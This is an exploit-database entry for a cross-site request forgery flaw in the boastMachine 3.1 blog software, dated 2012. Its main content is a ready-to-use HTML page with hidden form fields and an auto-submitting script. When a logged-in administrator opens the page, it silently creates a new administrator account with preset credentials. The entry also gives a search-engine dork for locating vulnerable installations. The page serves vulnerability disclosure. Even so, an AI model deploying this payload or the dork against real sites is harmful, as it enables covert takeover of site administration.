boastMachine 3.1 Cross Site Request Forgery

2012.03.29
Credit: Dr.NaNo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352
Dork: Powered by boastMachine v3.1

# Exploit Title: boastMachine v3.1 <= CSRF Add Admin Vulnerability # Date: 28/3/2012 # Author: Dr.NaNo # Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip # Version: 3.1 # Tested on: Linux-Red-Hat # Google Dork: Powered by boastMachine v3.1 # ######################################################## # ~ Exploit ~ # ######################################################## <html> <form name="nano" action="http://localhost/{PACH}/bmc/admin.php?action=add_user&blog" method="post"> <input type="hidden" name="action" value="add_user"><br/> <input type="hidden" name="do" value="add"><br/> <input type="hidden" value="NANO" name="user_login"><br/> <input type="hidden" value="NANO" name="user_pass"><br/> <input type="hidden" value="Administrator" name="user_name"><br/> <input type="hidden" value="security@wsecurity.com" name="user_email"><br/> <input type="hidden" value="4" name="blogs[]"><br/> <input type="hidden" value="4" name="user_level"><br/> <input type="hidden" value="Add"><br/> </form> <script>document.nano.submit();</script> </html> ######################################################## # # # ~ Greetz : Dr.WEP , JIKO , ( All FriendS ) ~ # # # ########################################################

References:

http://boastology.com/pages/dload.php?id=bmachine-3.1.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top